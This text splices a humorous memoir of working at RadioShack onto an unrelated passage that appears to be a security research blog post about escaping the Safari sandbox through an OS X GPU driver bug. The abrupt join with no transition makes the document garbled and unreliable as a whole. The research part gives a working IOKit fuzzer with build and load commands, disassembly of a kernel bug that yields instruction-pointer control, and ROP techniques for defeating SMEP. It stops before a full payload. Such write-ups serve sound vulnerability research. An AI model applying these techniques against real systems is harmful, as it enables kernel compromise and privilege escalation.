I recently bought a new phone from a Sprint employee who used to manage a Radio Shack. He told me about a time he ran his store for an entire day, 9 a.m. to 9 p.m., all by himself without a lunch break. After closing, he was told to immediately head to another store and help with their inventory. He stayed up all night doing so, then headed right back to his store for another 12-hour shift. Thirty-six hours.

VI.

I am not letting up on Radio Shack, a machine that sometimes operates in a way that could be confused with malevolence, hammering away at good people until they are a heap of dust and a plastic name tag.

I am not doing this because for a time, at least, Radio Shack tried to silence employees who shared their stories online. The company was the target of a class-action suit alleging (correctly) that it failed to pay massive amounts of overtime. A forum frequented by employees, RadioShackSucks, was instrumental in rounding up those who opted in to the suit.

At this point in history, it's inconceivable that a company would shut down an Internet forum for "defaming" them. That's what Radio Shack tried to do, and kind of did. I am not worried about this today, because that isn't how it works and because Radio Shack is now too half-dead to do anything about it anyway, and thank God.

VII.

And when I say "thank God," I'm also thinking of the people working there today who will probably be jobless soon. My heart breaks for them, and I hope they -- like me, the guy at the Sprint store, and my friends from those days -- go on to find a place that isn't so damned miserable. Many are great, massively over-qualified people who RadioShack never deserved for a second.

Some were, uh, not. For a few months, I worked with this guy I'll call Craig. He was a guy in his fifties who had been making lots of money growing pot out in the country until the feds busted him and took it all, and he mostly preferred to stand around and crack jokes about TV shows I'd never seen. Every day, halfway through his shift, he'd happily announce that he was going to go "take [his] medicine," and then sit in his car and get extraordinarily stoned and become Stoned Craig.

Stoned Craig would turn the volume all the way up on the Casio keyboards and just bang away at the keys. He didn't play music, it was just a bunch of BLONK BLONK BLONK BLONK, but he was having the sort of good time you and I might not be able to understand.

VIII.

Stoned Craig was considerably more skilled with the talking picture frames we'd always have on display: you pushed a button on the picture frame, and it'd play a pre-recorded message. Craig loved recording them; there was a new message every day.

So that sets the table for this: a nice old lady is browsing around the store and comes across one of the picture frames. There's a stock image in the frame, a little girl in a tire swing with an ear-to-ear grin.

From across the store I see her, praying that today's affirmation is at least G-rated. She presses the button. The voice of Stoned Craig, which sounds just like Tom Waits, blares forth.

QUIT FINGERIN' THE GODDAMN MERCHANDISE AND MAKE A FUCKIN' PURCHASE!

The old lady busted out laughing, and I think she might have ended up buying the picture frame. If she did, that might have been the only sale Craig ever had a hand in making.

IX.

Once, I was activating a cell phone for a customer when Stoned Craig staggered over to me. Then he just stood there. After a minute, he said, "I'm hungry, Paw." If he was quoting something, I still have no idea what it was. He just kept repeating it.

Stoned Craig. I'm hungry, Paw.
Me: ... so this is a $39.99 plan, and if you sign a two-year deal, you'll also get 500 text messages--
Stoned Craig. I'm hungry, Paw.
Customer: Is he all right?
Me: Hey, Craig. You wanna maybe chill out in the back room for a minute?
Stoned Craig. [walking away] I'm hungry, Paw.

Hope that you're doing well, Craig, and that you found a dinner out there somewhere.

X.

There is a part of me who isn't comfortable with talking this way about an employer who provided my income for three and a half years, but I, along with most people I worked with, put in far more than we got back.

A friend of mine worked at a RadioShack in a decrepit mall that has since been torn down. There was a restaurant upstairs, and in the middle of the night, its floor collapsed, along with its plumbing. He opened the store the next morning to find it covered in sewage and human waste; to hear him tell it, there were fifty pounds of it all over the place.

Any reasonable business, of course, would immediately pick up the phone and hire a hazmat team. Our district office ordered my friend to clean it up himself. When he refused, he almost lost his job.

XI.

RadioShack would claim to its new hires that its sales associates commonly made $20 per hour, which is inarguably complete bullshit; the majority of ground-level employees I knew averaged less than half that figure. As a result, the workforce was a revolving door of people who realized they'd been suckered, realized it wasn't going to get better, and quit. The long-term employees were often like me -- we would have moved on if we could have found anything better.

We all fantasized about quitting in dramatic fashion, dropping our name tag on our manager's desk, and stomping out. I never did, and came closest to it when my manager accused me of stealing a CD-ROM drive out of one of the desktop computers. There was an empty space in the tower where a CD-ROM drive would go, but there had never been one there.

My manager, who had spent Lord knows how long in an overworked, screamed-at, sleep-deprived haze, suddenly decided that there had, in fact, been a CD-ROM drive in that computer. Further, she decided that I, the only one who had stuck with her over the last year and the one who had been there for her so many times, was the one who stole it. When I denied this, I was screamed at, and she threatened to call the loss prevention department and/or the police.

In a huff, she picked up the phone to call another manager and prove the computers were supposed to have those drives. Nope. She called another: no. She finally relented when the third manager told her no. I told her I thought I deserved an apology. She flatly told me that, no, I would not get an apology, and that by the way, the store's schedule had changed and I wouldn't be able to take my planned vacation.

XII.

At that point in my career, I would have at least had an honest-to-god name tag to indignantly throw on the ground. I spent my first year wearing this one, with my name handwritten on a scrap of paper I taped to it. They just wouldn't order me one.

Once, during a store visit, my district manager scolded me for not wearing the name tag I didn't have, and insisted I wear a proper one, any one we had lying around. I had the option of being Chad or Elizabeth. I decided to be Elizabeth, and then he said that no, I could not be Elizabeth.

XIII.

The fun thing about those name tags: they were magnetic. For fun, we used to walk by each other and slap them off each other's shirts.

I did this to my assistant manager all the time. I'd found a spare "ASSISTANT MANAGER" name tag of his, which I'd altered with black electrical tape and hid in my pocket. I smacked his name tag off his chest, bent down to pick it up, and gave him the other one through sleight-of-hand. And that is how he ended up wearing a name tag for an entire day that read "ASS MAN."

XIV.

The majority of my RadioShack experience felt like guard duty. Depending on the store and the time of year, I could go four or five hours without seeing a single person walk in the door.

We kind of had to amuse ourselves. For some damn reason, the company had ordered a ludicrous number of remote-controlled PT Cruisers. We literally had a hundred of them in our little store alone. Nobody bought them, of course, because PT Cruisers are boring and stupid.

So a friend of mine would take a couple of them out to the middle of the mall and hold impromptu demolition derbies, just smashing them into each other until one of them stopped working. They would draw little crowds, and employees of nearby stores would stand in their doorways and watch. We even put money on them one time.

Look, y'all. RadioShack may have been a crummy company, but I'm not blameless here, either.

XV.

The same merchandise procurers who ordered all those PT Cruisers ordered all kinds of other unsellable crap, like remote-controlled Brum cars. It's okay that you don't know what Brum is. It's a British children's cartoon that nobody in America has ever heard of.

And yet, we were required to display a stack of 20 or so Brum cars right in the middle of an already-cramped store, because we were so desperate to get rid of them. People would walk around them and bump into them and say, "uh, what is Brum?" Zero of them were sold.

After months of this, a family I presume to be from England walked into the store one day. They saw the display and their eyes lit up in unison. And I swear to God: they made a circle around the Brum toys and held hands and started dancing around it, singing the Brum song. Either it's a two-minute-long song, or they sung it a bunch of times in a row.

It remains one of the most surreal moments of my entire life. They didn't buy one, either.

XVI.

RadioShack also tried to sell a thing called a CueCat, although by the time I started working there, they were trying without much success to give them away for free. A CueCat was an infrared scanner that read barcodes from magazine ads.

This was the idea: you, the consumer, were supposed to sit next to your computer and read a magazine. When you saw an ad you liked, you were supposed to scan it with the CueCat and hook it up to your computer, and it would direct your browser to the advertiser's web site.

This technology was developed by a man who legally changed his name to J. Hutton Pulitzer. Here is a long, barely-intelligible interview of him that you shouldn't read; half the time, I can't understand what the Hell he's talking about. RadioShack gave tens of millions of dollars to this dude because they thought consumers' idea of a good time was to sit there, do all the work, and advertise to themselves. If there is such a thing as dada investing, this was it.

This might have been the dumbest of many, many dumb ideas to come from RadioShack over the last 15 years. I think it's perfectly understandable, to be honest.

This is a consumer technology business that is built to work perfectly in the year 1975. The Internet comes around, and this, being a technology company, is expected to move on it aggressively and know what it's doing, except basically nobody really understood the Internet for a very long time. So they whiffed big a few times. Then the iPhone came around and rendered half the stuff RadioShack sold completely redundant. This company needed to become something radically different a decade ago. I just don't think it knows how to be anything else.

It's like retracing the steps and doings of a drunk person: okay, here's where he keyed the cop car. Wait, why'd he do that? I don't know, but his pants are lying here, so this is before he stripped naked and tried to rob the library.

XVII.

Working at RadioShack was sort of the worst of two worlds: there was the poverty-level income of a blue-collar retail job, coupled with the expectations, political nonsense, and corporate soullessness of the white-collar environment.

At least once a month, often on our days off, we were expected to show up, in dress code, to the district office for a two-hour meeting. Sometimes we'd be individually picked out and shamed as people whose sales numbers weren't good enough for them. I still remember a woman crying in front of everyone and leaving in embarrassment.

We were also shown videos from the corporate office in Fort Worth. One skit stands out in particular. Four of RadioShack's regional executives were sitting at a poker table, "betting" on which of their regions would perform best in Q3.

Midwest executive: I'm betting that my region leads sales this quarter.
Northeast executive: You know what? My sales associates know they need to offer DirecTV and Sprint to every customer who walks in the door. I will call you ... and raise you. [shoves stack of chips to middle of table]

(Note: that is a string bet, you dingdong.)

Southwest executive: Well, my sales associates know they must sell H.O.T. the A.A.A. way! I raise!
Northwest executive: When it comes to my sales associates ... [pushes enormous stack of chips] ... I'm allllll in.

We were supposed to watch this and take pride in our thousand-store region and be motivated to, I don't know, earn bonuses for these executives? We, the people taking home a thousand bucks a month, who go to work with holes in our last pairs of khakis, who walk an hour to work every day because we can't afford car repairs, who managed a store for 80 hours last week and received a figure below minimum wage for the trouble. We, who are scuttling our only day off so we can sit here and hear about the money they want to make and how useless we are.

It's fair to ask me why I worked there for so long. I just couldn't find a job I thought was better, and tried to convince myself in the moment that it wasn't so bad.

XVIII.

I said that a lot of working at RadioShack felt like guard duty. One week, it was actual guard duty: a RadioShack in a stone-dead mall was scheduled to close in a week, and all its employees had already bailed, so they sent me there to manage it for a few days.

The first day, I opened the store for 12 hours, and not a single person walked in. The second day, a guy bought a watch battery, and the store revenue for the week upped to $2.99. It didn't take me long to pull out the desk chair from the back room, have a seat in the middle of the store, rewire the display TVs, and watch MacGyver on satellite.

And it's true that I was making pennies above minimum wage, but it's also true that my job was to go to a building, turn on the lights, sit there, be the boss of myself, watch a shitload of MacGyver, and go home. MacGyver is an awesome show and I will never have a better week of work than that one.

On the second-to-last day there, I left the store empty for 30 seconds so I could use the bathroom, and within those 30 seconds, someone sprinted in and straight-up stole the cash drawer and the $300 inside of it. In a panic, I called the district office to let them know.

Their response, more or less, was, "eh, whatever." Damn it, I could have just taken it myself. I could have given myself a $300 raise for watching the dang MacGyver.

If that thief counts as a customer, I had two customers that week.

XIX.

Me. Thanks for calling RadioShack, this is Jon. How may I help you?
Old man. Jon, is it?
Me. Yep.
Old man. Well, I got a joke for you, would you like to hear it?
Me. Sure.
Old man. Well, they call it the World Wide Web, is that right?
Me. They do.
Old man. Now, would that make Bill Gates the spider?
Me. I guess it would!
Old man. Well, that's all. I just thought of that joke, and I thought, "who might get a kick out of that?" And I figured y'all at the RadioShack would get a kick out of it.
Me. I loved it.
Old man. Take care now.

That wonderful old man, to this day, is one of my chief comedic inspirations. God bless him.

* * *

On Thanksgiving, the people of RadioShack will be working for a company that has, perhaps, finally run out of new ways to make them sad. They are people who RadioShack never deserved. People who, God willing, will go on to find a job better than this one.

I bet RadioShack was great once. I can't look through their decades-old catalogs and come away with any other impression. They sold giant walnut-wood speakers I'd kill to have today. They sold computers back when people were trying to understand what they were. When I was a little kid, going to RadioShack was better than going to the toy store. It was the toy store for tall people.

By the time I got tall and worked there, RadioShack had already begun to die, I think. It failed exotically, with great flourishes, on canvases large and small, and in ways previously unimagined, taking pause only to kick around the souls who kept it alive. It doesn't have me to kick around anymore, and soon, it won't have anyone.

Damn. I mean, Thanksgiving. Y'all just had to get one last shot in, didn't you?

Images found via RadioShackCatalogs.com, which is one hell of a site to look through in the year 2014.

Escaping the Safari sandbox with a kernel GPU bug

2 hours 34 min ago

Posted by Ian Beer



TL;DR

An OS X GPU driver trusted a user-supplied kernel C++ object pointer and called a virtual function. The IOKit registry contained kernel pointers which were used defeat kASLR. A kernel ROP payload ran Calculator.app as root using a convenient kernel API.

Overview of part I

We finished part I with the ability to load our own native library into the Safari renderer process on OS X by exploiting an integer truncation bug in the Safari javascript engine. Here in part II we’ll take a look at how sandboxing works on OS X, revise some OS X fundamentals and then exploit two kernel bugs to launch Calculator.app running as root from inside the Safari sandbox.

Safari process model

Safari’s sandboxing model is based on privilege separation. It uses the WebKit2 framework to communicate between multiple separate processes which collectively form the Safari browser. Each of these processes is responsible for a different part of the browser and sandboxed to only allow access to the system resources it requires.

Specifically Safari is split into four distinct process families:

  • WebProcesses are the renderers - they’re responsible for actually drawing web pages as well as dealing with most active web content such as javascript

  • NetworkProcess is the process which talks to the network

  • PluginProcesses are the processes which host native plugins like Adobe Flash

  • UIProcess is the unsandboxed parent of all the other processes and is responsible for coordinating the activity of the sandboxed processes such that a webpage is actually displayed to the user which they can interact with

The Web, Network and Plugin process families are sandboxed. In order to understand how to break out of the WebProcess that we find ourselves in we’ve first got to understand how this sandbox is implemented.

OS X sandboxing primitives

OS X uses the Mandatory Access Control (MAC) paradigm to implement sandboxing, specifically it uses the TrustedBSD framework. Use of the MAC sandboxing paradigm implies that whenever a sandboxed process tries to acquire access to some system resource, for example by opening a file or creating a network socket, the OS will first check: Does this particular process have the right to do this?

An implementation of sandboxing using TrustedBSD has two parts: firstly, hooks must be added to the kernel code wherever a sandboxing decision is required. A TrustedBSD hook looks like this:

/* bsd/kern/uipc_syscalls.c */

int socket(struct proc *p, struct socket_args *uap, int32_t *retval)

{

#if CONFIG_MACF_SOCKET_SUBSET

if ((error = mac_socket_check_create(kauth_cred_get(), uap->domain,

   uap->type, uap->protocol)) != 0)

return (error);

#endif /* MAC_SOCKET_SUBSET */

...

That snippet of code is from the implementation of the socket syscall on OS X. If MAC support has been enabled at compile time then the very first thing the socket syscall implementation will do is call mac_socket_check_create, passing the credentials of the calling processes and the domain, type and protocol of the requested socket:

/* security/mac_socket.h */

int mac_socket_check_create(kauth_cred_t cred, int domain, int type, int protocol)

{

int error;

if (!mac_socket_enforce)

return 0;

MAC_CHECK(socket_check_create, cred, domain, type, protocol);

return (error);

}

Here we see that if the enforcement of MAC on sockets hasn’t been globally disabled (mac_socket_enforce is a variable exposed by the sysctl interface) then this function falls through to the MAC_CHECK macro:

/* security/mac_internal.h */

#define MAC_CHECK(check, args...) do {     \

for (i = 0; i < mac_policy_list.staticmax; i++) {  \

mpc = mac_policy_list.entries[i].mpc;          \

...

if (mpc->mpc_ops->mpo_ ## check != NULL)       \

error = mac_error_select(           \

   mpc->mpc_ops->mpo_ ## check (args), \

   error);

This macro is the core of TrustedBSD. mac_policy_list.entries (the first highlighted chunk) is a list of policies and the second highlighted chuck is TrustedBSD consulting the policy. In actual fact a policy is nothing more than a C struct (struct policy_ops) containing function pointers (one per hook type) and consultation of a policy simply means calling the right function pointer in that struct.

If that policy function returns 0 (or isn’t implemented at all by the policy) then the MAC check succeeds. If the policy function returns a non-zero value then the MAC check fails and, in the case of this socket hook, the syscall will fail passing the error code back up to userspace and the rest of the socket syscall won’t be executed.

The second part of an implementation of sandboxing using TrustedBSD is the provision of these policy modules. Although TrustedBSD allows multiple policy modules to be present at the same time in practice on OS X there’s only one and it’s implemented in its own kernel extension: Sandbox.kext. When it's loaded Sandbox.kext registers itself as a policy with TrustedBSD by passing a pointer to its policy_ops structure. TrustedBSD adds this to the mac_policy_list.entries array seen earlier and will then call into Sandbox.kext whenever a sandboxing decision is required.

Sandbox.kext and the OS X sandbox policy_ops

This paper from Dionysus Blazakis, this talk from Meder Kydyraliev and this reference from @osxreverser go into great detail about Sandbox.kext and its operation and usage.

Summarizing those linked resources, every process can have a unique sandbox profile. For (almost) every MAC hook type Sandbox.kext allows a sandbox profile to specify a decision tree to be used to determine whether the MAC check should pass or fail. This decision tree is expressed in a simple scheme-like DSL built from tuples of actions, operations and filters (for a more complete guide to the syntax refer to the linked docs):

(action operation filter)



  • Actions determine whether a particular rule corresponds to passing or failing the MAC check. Actions are the literals allow and deny.
  • Operations define which MAC hooks this rule applies to. For example the file-read operation allows restricting read access to files.
  • Filters allow a more granular application of operations, for example a filter applied to the file-read operation could define a specific file which is or isn’t allowed.

Here’s a snippet from the WebProcess sandbox profile to illustrate that:

(deny default (with partial-symbolication))

...

(allow file-read*

      ;; Basic system paths

      (subpath "/Library/Dictionaries")

      (subpath "/Library/Fonts")

      (subpath "/Library/Frameworks")

      (subpath "/Library/Managed Preferences")

      (subpath "/Library/Speech/Synthesizers")

      (regex #"^/private/etc/(hosts|group|passwd)$")

...

)

As you can see sandbox profiles are very readable on OS X. It’s usually quite clear what any particular sandbox profile allows and denies. In this example the profile is using regular expressions to define allowed file paths (there’s a small regex matching engine in the kernel in AppleMatch.kext.)

Sandbox.kext also has a mechanism which allows userspace programs to ask for policy decisions. The main use of this is to restrict access to system IPC services, access to which isn’t mediated by the kernel (so there’s nowhere to put a MAC hook) but by the userspace daemon launchd.

Enumerating the attack surface of a sandboxed process Broadly speaking there are two aspects to consider when enumerating the attack surface reachable from within a particular sandbox on OS X:


  • Actions which are specifically allowed by the sandbox policy - these are easy to enumerate by looking at the sandbox policy files.

  • Those actions which are allowed because either because the Sandbox.kext policy_ops doesn’t implement the hook callback or because there’s no hook in place at all.

The Safari WebProcess sandbox profile is located here:

/System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb

This profile uses an import statement to load the contents of  /System/Library/Sandbox/Profiles/system.sb which uses the define statement to declare various broad sandboxing rulesets which define all the rules required to use complete OS X subsystems such as graphics or networking. Amongst others the Webprocess.sb profile uses (system-graphics) which is defined here in system.sb:

(define (system-graphics)

...

 (allow iokit-open

        (iokit-connection "IOAccelerator")

        (iokit-user-client-class "IOAccelerationUserClient")

        (iokit-user-client-class "IOSurfaceRootUserClient")

        (iokit-user-client-class "IOSurfaceSendRight"))

 )

)

This tells us that the WebProcess sandbox has pretty much unrestricted access to the GPU drivers. In order to understand what the iokit-user-client-class actually means and what this gives us access to we have to step back and take a look at the various parts of OS X involved in the operation of device drivers.


OS X kernel fundamentals

There are two great books I’d recommend to learn more about the OS X kernel: the older but still relevant “Mac OS X Internals” by Amit Singh and the more recent “Mac OS X and iOS Internals: To the Apple’s Core” by Jonathan Levin.
The OS X wikipedia article contains a detailed taxonomic discussion of OS X and its place in the UNIX phylogenetic tree but for our purposes it’s sufficient to divide the OS X kernel into three broad subsystems which collectively are known as XNU:
BSD

The majority of OS X syscalls are BSD syscalls. The BSD-derived code is responsible for things like file systems and networking.
Mach

Originally a research microkernel from CMU mach is responsible for many of the low-level idiosyncrasies of OS X. The mach IPC mechanism is one of the most fundamental parts of OS X but the mach kernel code is also responsible for things like virtual memory management.
Mach only has a handful of dedicated mach syscalls (mach calls them traps) and almost all of these only exist to support the mach IPC system. All further interaction with the mach kernel subsystems from userspace is via mach IPC.
IOKit

IOKit is the framework used for writing device drivers on OS X. IOKit code is written in C++ which brings with it a whole host of new bug classes and exploitation possibilities. We'll return to a more detailed discussion of IOKit later.

Mach IPC

If you want to change the permissions of a memory mapping in your process, talk to a device driver, render a system font, symbolize a crash dump, debug another process or determine the current network connectivity status then on OS X behind the scenes you’re really sending and receiving mach messages. In order to find and exploit bugs in all those things it’s important to understand how mach IPC works:

Messages, ports and queues

Mach terminology can be a little unclear at times and OS X doesn’t ship with the man pages for the mach APIs (but you can view them online here.)

Fundamentally mach IPC is message-oriented protocol. The messages sent via mach IPC are known as mach messages. Sending a mach message really means the message gets enqueued into a kernel-maintained message queue known as a mach port.

Only one process can dequeue messages from a particular port. In mach terminology this process has a receive-right for the port. Multiple processes can enqueue messages to a port - these processes hold send-rights to that port.

Within a process these send and receive rights are called mach port names. A mach port name is used to index a per-process mapping between mach port names and message queues (akin to how a process-local UNIX file descriptor maps to an actual file):


In this diagram we can see that the process with PID 123 has a mach port name 0xabc. It’s important to notice that this Mach port name only has a meaning within this process - we can see that in the kernel structure for this process 0xabc is just a key which maps to a pointer to a message queue.

When the process with PID 456 tries to dequeue a message using the mach port name 0xdef the kernel uses 0xdef to index that process’s map of mach ports such that it can find the correct message queue from which to dequeue a message.

Mach messages

A single mach message can have up to four parts:

  • Message header - this header is mandatory and specifies the port name to send the message to as well as various flags.

  • Kernel processed descriptors - this optional section can contain multiple descriptors which are parts of the message which need to be interpreted by the kernel.

  • Inline data - this is the inline binary payload.

  • Audit trailer - The message receiver can request that the kernel append an audit trailer to received messages.


When a simple mach message containing no descriptors is sent it will first be copied entirely into a kernel heap-allocated buffer in the kernel. A pointer to that copy is then appended to the correct mach message queue and when the process with a receive right to that queue dequeues that message the kernel copy of the message gets copied into the receiving process.

Out-of-line memory

Copying large messages into and out of the kernel is slow, especially if the messages are large. In order to send large amounts of data you can use the “out-of-line memory” descriptor. This enables the message sender to instruct the kernel to make a copy-on-write virtual memory copy of a buffer in the receiver process when the message is dequeued.

Bi-directional messages

Mach IPC is fundamentally uni-directional. In order to build a two-way IPC mechanism mach IPC allows for messages to carry port rights. In a mach message, along with binary data you can also send a mach port right.

Mach IPC is quite flexible when it comes to sending port rights to other processes. You can use the local_port field of the mach message header, use a port descriptor or use an OOL-ports descriptor. There are a multitude of flags to control exactly what rights should be transferred, or if new rights should be created during the send operation (it’s common to use the MAKE_SEND flag which creates and sends a new send right to a port which you hold the receive right for.)

Bootstrapping Mach IPC

There’s a fundamental bootstrapping problem with mach IPC: how do you get a send right to a port for which another process has a receive right without first sending them a message (thus encountering the same problem in reverse.)

One way around this could be to allow mach ports to be inherited across a fork() akin to setting up a pipe between a parent and child process using socketpair(). However, unlike file descriptors, mach port rights are not inherited across a fork so you can’t implement such a system.

Except, some mach ports are inherited across a fork! These are the special mach ports, one of which is the bootstrap port. The parent of all processes on OS X is launchd, and one of its roles is to set the default bootstrap port which will then be inherited by every child.

Launchd

Launchd holds the receive-right to this bootstrap port and plays the role of the bootstrap server, allowing processes to advertise named send-rights which other processes can look up. These are OS X Mach IPC services.

MIG

We’re now at the point where we can see how the kernel and userspace Mach IPC systems use a few hacks to get bootstrapped such that they’re able to send binary data. This is all that you get with raw Mach IPC.


MIG is the Mach Interface Generator and it provides a simple RPC (remote procedure call) layer on top of the raw mach message IPC. MIG is used by all the Mach kernel services and many userspace services.

MIG interfaces are declared in .defs files. These use a simple Interface Definition Language which can define function prototypes and simple data structures. The MIG tool compiles the .defs into C code which implements all the required argument serialization/deserialization.

Calling a MIG RPC is completely transparent, it’s just like calling a regular C function and if you’ve ever programed on a Mac you’ve almost certainly used a MIG generated header file.

IOKit

As mentioned earlier IOKit is the framework and kernel subsystem used for device drivers. All interactions with IOKit begin with the IOKit master port. This is another special mach port which allows access to the IOKit registry. devices.defs is the relevant MIG definition file. The Apple developer documentation describes the IOKit registry in great detail.
The IOKit registry allows userspace programs to find out about available hardware. Furthermore, device drivers can expose an interface to userspace by implementing a UserClient.

The main way which userspace actually interacts with an IOKit driver's UserClient is via the io_connect_method MIG RPC:

type io_scalar_inband64_t = array[*:16] of uint64_t;

type io_struct_inband_t   = array[*:4096] of char;


routine io_connect_method(

 connection            : io_connect_t;

 in    selector        : uint32_t;


 in    scalar_input    : io_scalar_inband64_t;

 in    inband_input    : io_struct_inband_t;

 in    ool_input      : mach_vm_address_t;

 in    ool_input_size  : mach_vm_size_t;


 out   inband_output   : io_struct_inband_t, CountInOut;

 out   scalar_output   : io_scalar_inband64_t, CountInOut;

 in    ool_output      : mach_vm_address_t;

 inout ool_output_size : mach_vm_size_t

);

This method is wrapped by the IOKitUser library function IOConnectCallMethod.

The kernel implementation of this MIG API is in IOUserClient.cpp in the function 

is_io_connect_method:

  kern_return_t is_io_connect_method

   (

    io_connect_t connection,

    uint32_t selector,

    io_scalar_inband64_t scalar_input,

    mach_msg_type_number_t scalar_inputCnt,

    io_struct_inband_t inband_input,

    mach_msg_type_number_t inband_inputCnt,

    mach_vm_address_t ool_input,

    mach_vm_size_t ool_input_size,

    io_struct_inband_t inband_output,

    mach_msg_type_number_t *inband_outputCnt,

    io_scalar_inband64_t scalar_output,

    mach_msg_type_number_t *scalar_outputCnt,

    mach_vm_address_t ool_output,

    mach_vm_size_t *ool_output_size

    )

   {

       CHECK( IOUserClient, connection, client );

       

       IOExternalMethodArguments args;

...     

       args.selector = selector;

       

       args.scalarInput = scalar_input;

       args.scalarInputCount = scalar_inputCnt;

       args.structureInput = inband_input;

       args.structureInputSize = inband_inputCnt;

...

       args.scalarOutput = scalar_output;

       args.scalarOutputCount = *scalar_outputCnt;

       args.structureOutput = inband_output;

       args.structureOutputSize = *inband_outputCnt;     

...

       ret = client->externalMethod( selector, &args );

Here we can see that the code fills in an IOExternalMethodArguments structure from the arguments passed to the MIG RPC and then calls the ::externalMethod method of the IOUserClient.

What happens next depends on the structure of the driver’s IOUserClient subclass. If the driver overrides externalMethod then this calls straight into driver code. Typically the selector argument to IOConnectCallMethod would be used to determine what function to call, but if the subclass overrides externalMethod it’s free to implement whatever method dispatch mechanism it wants. However if the driver subclass doesn’t override externalMethod the IOUserClient implementation of it will call getTargetAndMethodForIndex passing the selector argument - this is the method which most IOUserClient subclasses override - it returns a pointer to an IOExternalMethod structure:

struct IOExternalMethod {

   IOService *  object;

   IOMethod     func;

   IOOptionBits flags;

   IOByteCount  count0;

   IOByteCount  count1;

};


Most drivers have a simple implementation of getTargetAndMethodForType which uses the selector argument to index an array of IOExternalMethod structures. This structure contains a pointer to the method to be invoked (and since this is C++ this isn’t actually a function pointer but a pointer-to-member-method which means things can get very fun when you get to control it! See the bug report for CVE-2014-1379 in the Project Zero bugtracker for an example of this.)

The flags member is used to define what mixture of input and output types the ExternalMethod supports and the count0 and count1 fields define the number or size in bytes of the input and output arguments. There are various shim functions which make sure that func is called with the correct prototype depending on the declared number and type of arguments.

Putting all that together

At this point we know that when we call IOConnectCallMethod what really happens is that C code auto-generated by MIG serializes all the arguments into a data buffer which is wrapped in a mach message which is sent to a mach port we received received from the IOKit registry which we knew how to talk to because every process has a special device port. That message gets copied into the kernel where more MIG generated C code deserializes it and calls is_io_connect_method which calls the driver’s externalMethod virtual method.

Writing an IOKit fuzzer

When auditing code alongside manual analysis it’s often worth writing a fuzzer. As soon as you’ve understood where attacker-controlled data could enter a system you can write a simple piece of code to throw randomness at it. As your knowledge of the code improves you can make incremental improvements to the fuzzer, allowing it to explore the code more deeply.


IOConnectCallMethod is the perfect example of a API where this applies. It’s very easy to write a simple fuzzer to make random IOConnectCallMethod calls. One approach to slightly improve on just using randomness is to try to mutate real data. In this case, we want to mutate valid arguments to IOConnectCallMethod. Check out this talk from Chen Xiaobo and Xu Hao about how to do exactly that.

DYLD interposing

dyld is the OS X dynamic linker. Similar to using LD_PRELOAD on linux dyld supports dynamic link time interposition of functions. This means we can intercept function calls between different libraries and inspect and modify arguments.

Here’s the complete IOConnectCallMethod fuzzer interpose library I wrote for pwn4fun:

#include <stdint.h>

#include <stdio.h>

#include <stdlib.h>

#include <time.h>

#include <IOKit/IOKitLib.h>


int maybe(){

 static int seeded = 0;

 if(!seeded){

   srand(time(NULL));

   seeded = 1;

 }

 return !(rand() % 100);

}


void flip_bit(void* buf, size_t len){

 if (!len)

   return;

 size_t offset = rand() % len;

 ((uint8_t*)buf)[offset] ^= (0x01 << (rand() % 8));

}


kern_return_t

fake_IOConnectCallMethod(

 mach_port_t connection,

 uint32_t    selector,

 uint64_t   *input,

 uint32_t    inputCnt,

 void       *inputStruct,

 size_t      inputStructCnt,

 uint64_t   *output,

 uint32_t   *outputCnt,

 void       *outputStruct,

 size_t     *outputStructCntP)

{

 if (maybe()){

   flip_bit(input, sizeof(*input) * inputCnt);

 }


 if (maybe()){

   flip_bit(inputStruct, inputStructCnt);

 }


 return IOConnectCallMethod(

   connection,

   selector,

   input,

   inputCnt,

   inputStruct,

   inputStructCnt,

   output,

   outputCnt,

   outputStruct,

   outputStructCntP);

}


typedef struct interposer {

 void* replacement;

 void* original;

} interpose_t;


__attribute__((used)) static const interpose_t interposers[]

 __attribute__((section("__DATA, __interpose"))) =

   {

     { .replacement = (void*)fake_IOConnectCallMethod,

       .original    = (void*)IOConnectCallMethod

     }

   };


Compile that as a dynamic library:

$ clang -Wall -dynamiclib -o flip.dylib flip.c -framework IOKit -arch i386 -arch x86_64

and load it:

$ DYLD_INSERT_LIBRARIES=./flip.dylib hello_world

1% of the time this will flip one bit in any struct input and scalar input to an IOKit external method. This was the fuzzer which found the bug used to get kernel instruction pointer control for pwn4fun, and it found it well before I had any clue how the Intel GPU driver worked at all.

IntelAccelerator bug

Running the fuzzer shown above with any program using the GPU lead within seconds to a crash in the following method in the AppleIntelHD4000Graphics kernel extension at the instruction at offset 0x8BAF:

IGAccelGLContext::unmap_user_memory( ;rdi == this

  IntelGLUnmapUserMemoryIn *, ;rsi

  unsigned long long) ;rdx

__text:8AD6

__text:8AD6 var_30 = qword ptr -30h

...

__text:8AED  cmp   rdx, 8

__text:8AF1  jnz   loc_8BFB

__text:8AF7  mov   rbx, [rsi] ;rsi points to controlled data

__text:8AFA  mov   [rbp+var_30], rbx ;rbx completely controlled

...

__text:8BAB  mov   rbx, [rbp+var_30]

__text:8BAF  mov   rax, [rbx]        ;crash

__text:8BB2  mov   rdi, rbx

__text:8BB5  call  qword ptr [rax+140h]


Looking at the cross references to this function in IDA Pro we can see that unmap_user_memory is selector 0x201 of the IGAccelGLContent user client. This external method has one struct input so on entry to this function rsi points to controlled data (and rdx contains the length of that struct input in bytes.)

At address 0x8af7 this function reads the first 8 bytes of the struct input as a qword and saves them in rbx. At this point rbx is completely controlled. This controlled value is then saved into the local variable var_30. Later at 0x8bab this value is read back into rbx, then at 0x8baf that controlled value is dereferenced without any checks leading to a crash. If that dereferences doesn't crash however, then the qword value at offset 0x140 from the read value will be called.

In other words, this external method is treating the struct input bytes as containing a pointer to a C++ object and it’s calling a virtual method of that object without checking whether the pointer is valid. Kernel space is just trusting that userspace will only ever pass a valid kernel object pointer. So by crafting a fake IOKit object and passing a pointer to it as the struct input of selector 0x201 of IGAccelGLContent we can get kernel instruction pointer control! Now what?

SMEP/SMAP

SMEP and SMAP are two CPU features designed to make exploitation of this type of bug trickier.

Mavericks supports Supervisor Mode Execute Prevention which means that when the processor is executing kernel code the cpu will fault if it tries to execute code on pages belonging to userspace. This prevents us from simply mapping an executable kernel shellcode payload at a known address in userspace and getting the kernel to jump to it.


The generic defeat for this mitigation is code-reuse (ROP). Rather than diverting execution directly to shellcode in userspace instead we have to divert it to existing executable code in the kernel. By “pivoting” the stack pointer to controlled data we can easily chain together multiple code chunks and either turn off SMEP or execute an entire payload just in ROP.

